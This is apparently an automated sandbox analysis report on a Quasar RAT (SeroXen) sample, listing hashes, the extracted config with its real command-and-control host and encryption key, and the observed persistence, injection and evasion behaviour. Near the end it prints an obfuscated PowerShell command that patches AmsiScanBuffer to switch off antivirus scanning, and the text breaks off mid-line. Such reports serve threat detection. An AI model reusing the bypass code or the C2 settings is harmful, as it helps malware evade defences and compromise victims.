Analysis
-
max time kernel
150s -
max time network
134s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-05-2024 18:14
General
-
Target
Uni.exe
-
Size
409KB
-
MD5
16e4226eddebe2148b46353c351ec570
-
SHA1
5879aab64c4d4c086f24807f85c3f1bec657db9c
-
SHA256
04f86ef6a2870bcaff958187d1bbf7281e6c8c1c1f2fbefddc11e3a379e4f9b9
-
SHA512
7fa89b0aee061fca53534c7e38dfa873235095e32f64e87d7a8457e765f804d8f2408e90b90a484ea3e9c18d1110a5667de9aab14d9d9e22911433e9da4cfd38
-
SSDEEP
6144:cMfPp5S6M1Xy0vjzilQA9QU9sX0bx4UmWOQ6rhxODbfFOqb:Rpg6M1i+jzilQoAVUmjJtx2fF5b
Malware Config
Extracted
quasar
3.1.5
SeroXen
tue-jake.gl.at.ply.gg:29058
$Sxr-NCZpRTaGL620kkY20c
-
encryption_key
0CaeSao9jSngJXRQGaoy
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
SeroXen
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/816-1-0x0000000000070000-0x00000000000DC000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\SubDir\Client.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1084 created 632 1084 powershell.EXE winlogon.exe PID 4348 created 632 4348 powershell.EXE winlogon.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 3 IoCs
Processes:
Client.exeinstall.exeinstall.exepid process 1572 Client.exe 2480 install.exe 3504 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 1 raw.githubusercontent.com 4 raw.githubusercontent.com 10 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 6 IoCs
Processes:
powershell.EXEsvchost.exepowershell.EXEOfficeClickToRun.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1084 set thread context of 4188 1084 powershell.EXE dllhost.exe PID 4348 set thread context of 4844 4348 powershell.EXE dllhost.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 1612 schtasks.exe 5044 SCHTASKS.exe 3708 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={885A7A87-AB63-4A76-A8D1-34BE6C1ED385}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 18:16:09 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715710569" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEpowershell.EXEdllhost.exedllhost.exepid process 1084 powershell.EXE 1084 powershell.EXE 4348 powershell.EXE 4348 powershell.EXE 1084 powershell.EXE 4188 dllhost.exe 4188 dllhost.exe 4188 dllhost.exe 4188 dllhost.exe 4188 dllhost.exe 4188 dllhost.exe 4188 dllhost.exe 4188 dllhost.exe 4188 dllhost.exe 4188 dllhost.exe 4348 powershell.EXE 4844 dllhost.exe 4844 dllhost.exe 4188 dllhost.exe 4188 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe 4844 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3320 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Uni.exepowershell.EXEClient.exepowershell.EXEdllhost.exedllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 816 Uni.exe Token: SeDebugPrivilege 1084 powershell.EXE Token: SeDebugPrivilege 1572 Client.exe Token: SeDebugPrivilege 4348 powershell.EXE Token: SeDebugPrivilege 1084 powershell.EXE Token: SeDebugPrivilege 4188 dllhost.exe Token: SeDebugPrivilege 4348 powershell.EXE Token: SeDebugPrivilege 4844 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2732 svchost.exe Token: SeIncreaseQuotaPrivilege 2732 svchost.exe Token: SeSecurityPrivilege 2732 svchost.exe Token: SeTakeOwnershipPrivilege 2732 svchost.exe Token: SeLoadDriverPrivilege 2732 svchost.exe Token: SeSystemtimePrivilege 2732 svchost.exe Token: SeBackupPrivilege 2732 svchost.exe Token: SeRestorePrivilege 2732 svchost.exe Token: SeShutdownPrivilege 2732 svchost.exe Token: SeSystemEnvironmentPrivilege 2732 svchost.exe Token: SeUndockPrivilege 2732 svchost.exe Token: SeManageVolumePrivilege 2732 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2732 svchost.exe Token: SeIncreaseQuotaPrivilege 2732 svchost.exe Token: SeSecurityPrivilege 2732 svchost.exe Token: SeTakeOwnershipPrivilege 2732 svchost.exe Token: SeLoadDriverPrivilege 2732 svchost.exe Token: SeSystemtimePrivilege 2732 svchost.exe Token: SeBackupPrivilege 2732 svchost.exe Token: SeRestorePrivilege 2732 svchost.exe Token: SeShutdownPrivilege 2732 svchost.exe Token: SeSystemEnvironmentPrivilege 2732 svchost.exe Token: SeUndockPrivilege 2732 svchost.exe Token: SeManageVolumePrivilege 2732 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2732 svchost.exe Token: SeIncreaseQuotaPrivilege 2732 svchost.exe Token: SeSecurityPrivilege 2732 svchost.exe Token: SeTakeOwnershipPrivilege 2732 svchost.exe Token: SeLoadDriverPrivilege 2732 svchost.exe Token: SeSystemtimePrivilege 2732 svchost.exe Token: SeBackupPrivilege 2732 svchost.exe Token: SeRestorePrivilege 2732 svchost.exe Token: SeShutdownPrivilege 2732 svchost.exe Token: SeSystemEnvironmentPrivilege 2732 svchost.exe Token: SeUndockPrivilege 2732 svchost.exe Token: SeManageVolumePrivilege 2732 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2732 svchost.exe Token: SeIncreaseQuotaPrivilege 2732 svchost.exe Token: SeSecurityPrivilege 2732 svchost.exe Token: SeTakeOwnershipPrivilege 2732 svchost.exe Token: SeLoadDriverPrivilege 2732 svchost.exe Token: SeSystemtimePrivilege 2732 svchost.exe Token: SeBackupPrivilege 2732 svchost.exe Token: SeRestorePrivilege 2732 svchost.exe Token: SeShutdownPrivilege 2732 svchost.exe Token: SeSystemEnvironmentPrivilege 2732 svchost.exe Token: SeUndockPrivilege 2732 svchost.exe Token: SeManageVolumePrivilege 2732 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2732 svchost.exe Token: SeIncreaseQuotaPrivilege 2732 svchost.exe Token: SeSecurityPrivilege 2732 svchost.exe Token: SeTakeOwnershipPrivilege 2732 svchost.exe Token: SeLoadDriverPrivilege 2732 svchost.exe Token: SeSystemtimePrivilege 2732 svchost.exe Token: SeBackupPrivilege 2732 svchost.exe Token: SeRestorePrivilege 2732 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Client.exepid process 1572 Client.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Uni.exeClient.exepowershell.EXEdllhost.exedescription pid process target process PID 816 wrote to memory of 1612 816 Uni.exe schtasks.exe PID 816 wrote to memory of 1612 816 Uni.exe schtasks.exe PID 816 wrote to memory of 1612 816 Uni.exe schtasks.exe PID 816 wrote to memory of 1572 816 Uni.exe Client.exe PID 816 wrote to memory of 1572 816 Uni.exe Client.exe PID 816 wrote to memory of 1572 816 Uni.exe Client.exe PID 816 wrote to memory of 2480 816 Uni.exe install.exe PID 816 wrote to memory of 2480 816 Uni.exe install.exe PID 816 wrote to memory of 2480 816 Uni.exe install.exe PID 816 wrote to memory of 5044 816 Uni.exe SCHTASKS.exe PID 816 wrote to memory of 5044 816 Uni.exe SCHTASKS.exe PID 816 wrote to memory of 5044 816 Uni.exe SCHTASKS.exe PID 1572 wrote to memory of 3708 1572 Client.exe schtasks.exe PID 1572 wrote to memory of 3708 1572 Client.exe schtasks.exe PID 1572 wrote to memory of 3708 1572 Client.exe schtasks.exe PID 1572 wrote to memory of 3504 1572 Client.exe install.exe PID 1572 wrote to memory of 3504 1572 Client.exe install.exe PID 1572 wrote to memory of 3504 1572 Client.exe install.exe PID 1084 wrote to memory of 4188 1084 powershell.EXE dllhost.exe PID 1084 wrote to memory of 4188 1084 powershell.EXE dllhost.exe PID 1084 wrote to memory of 4188 1084 powershell.EXE dllhost.exe PID 1084 wrote to memory of 4188 1084 powershell.EXE dllhost.exe PID 1084 wrote to memory of 4188 1084 powershell.EXE dllhost.exe PID 1084 wrote to memory of 4188 1084 powershell.EXE dllhost.exe PID 1084 wrote to memory of 4188 1084 powershell.EXE dllhost.exe PID 1084 wrote to memory of 4188 1084 powershell.EXE dllhost.exe PID 4188 wrote to memory of 632 4188 dllhost.exe winlogon.exe PID 4188 wrote to memory of 688 4188 dllhost.exe lsass.exe PID 4188 wrote to memory of 980 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 388 4188 dllhost.exe dwm.exe PID 4188 wrote to memory of 476 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 628 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1060 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1116 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1128 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1192 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1200 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1220 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1340 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1424 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1512 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1520 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1544 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1676 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1732 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1748 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1816 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1876 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1980 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1992 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 2000 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 1584 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 2128 4188 dllhost.exe spoolsv.exe PID 4188 wrote to memory of 2252 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 2420 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 2504 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 2512 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 2548 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 2640 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 2676 4188 dllhost.exe sysmon.exe PID 4188 wrote to memory of 2716 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 2732 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 2744 4188 dllhost.exe svchost.exe PID 4188 wrote to memory of 2064 4188 dllhost.exe sihost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:388
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d935c6ce-737c-4829-84aa-3f8fd561983f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2415b56f-2e33-4f10-a7cd-4c16f48970b9}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:476
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:628
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1128
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:IQayQPaxKWXX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$LZVZWXVpFERacu,[Parameter(Position=1)][Type]$MlTregIfnM)$EOXrdgHBAdz=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'ef'+'l'+''+'e'+'c'+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+'d'+'u'+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+'y'+''+'p'+''+'e'+'',''+'C'+'l'+'a'+'s'+'s'+''+','+''+[Char](80)+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+'e'+''+'d'+','+[Char](65)+''+'n'+'s'+'i'+'Cl'+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+'C'+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$EOXrdgHBAdz.DefineConstructor('R'+[Char](84)+'S'+[Char](112)+''+[Char](101)+'c'+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'Hi'+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$LZVZWXVpFERacu).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+'i'+[Char](109)+''+'e'+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$EOXrdgHBAdz.DefineMethod(''+'I'+''+'n'+''+'v'+'o'+'k'+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+'S'+'i'+''+[Char](103)+''+','+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'ot'+[Char](44)+'Virtu'+[Char](97)+''+[Char](108)+'',$MlTregIfnM,$LZVZWXVpFERacu).SetImplementationFlags('Ru'+'n'+'t'+'i'+''+[Char](109)+'e'+[Char](44)+'M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $EOXrdgHBAdz.CreateType();}$pljiSZCUlegiE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+[Char](111)+'s'+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$jicIGYrmyJiTky=$pljiSZCUlegiE.GetMethod(''+'G'+'et'+[Char](80)+'r'+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'d'+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'bl'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jgBDxpAtpCdGYOUNSkA=IQayQPaxKWXX @([String])([IntPtr]);$QZmvkgqplAIMthhHPUFidA=IQayQPaxKWXX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MPynaSVXnXv=$pljiSZCUlegiE.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+'d'+[Char](108)+''+'l'+'')));$gOwNyBzWqiBRRa=$jicIGYrmyJiTky.Invoke($Null,@([Object]$MPynaSVXnXv,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$RNDfNFhPZDqgrkLjC=$jicIGYrmyJiTky.Invoke($Null,@([Object]$MPynaSVXnXv,[Object](''+[Char](86)+'i'+[Char](114)+''+'t'+''+'u'+'alPr'+'o'+''+'t'+''+'e'+''+[Char](99)+''+'t'+'')));$myycMky=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gOwNyBzWqiBRRa,$jgBDxpAtpCdGYOUNSkA).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$YvRuHxlKwiCmykVTp=$jicIGYrmyJiTky.Invoke($Null,@([Object]$myycMky,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$JydSHrvgHh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RNDfNFhPZDqgrkLjC,$QZmvkgqplAIMthhHPUFidA).Invoke($YvRuHxlKwiCmykVTp,[uint32]8,4,[ref]$JydSHrvgHh);[Runtime.InteropServices.Marshal]::Copy([Byt